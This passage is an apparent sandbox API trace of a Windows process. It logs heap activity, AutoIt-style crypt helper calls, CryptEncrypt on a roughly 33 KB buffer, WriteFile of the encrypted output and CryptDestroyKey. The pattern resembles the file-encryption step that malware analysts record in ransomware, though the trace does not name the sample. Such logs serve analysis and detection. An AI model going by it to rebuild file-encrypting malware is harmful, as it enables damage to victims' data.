0x43cffb8 [0076.859] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0076.859] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0076.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.860] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0076.860] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0076.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0076.860] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0076.860] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0076.861] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0076.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0076.861] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x83cc) returned 0x4908bd0 [0076.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca8f8 [0076.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.863] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x83cc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x83d0) returned 1 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0076.864] CharLowerBuffW (in: lpsz="byte[33745]", cchLength=0xb | out: lpsz="byte[33745]") returned 0xb [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0076.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0076.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cab08 [0076.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.864] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4908bd0*, pdwDataLen=0x144e790*=0x83cc, dwBufLen=0x83d0 | out: pbData=0x4908bd0*, pdwDataLen=0x144e790*=0x83d0) returned 1 [0076.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0076.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0076.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0076.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0076.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0076.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0076.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0076.865] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.865] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.865] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.865] WriteFile (in: hFile=0x258, lpBuffer=0x4931f18*, nNumberOfBytesToWrite=0x83d0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4931f18*, lpNumberOfBytesWritten=0x144f194*=0x83d0, lpOverlapped=0x0) returned 1 [0076.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4931f18 | out: hHeap=0x1780000) returned 1 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0076.868] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0076.868] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0076.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0076.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0076.869] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0076.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.869] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.870] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0076.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca568, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.870] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0076.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.871] CryptDestroyKey (hKey=0x41ac700) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.871] 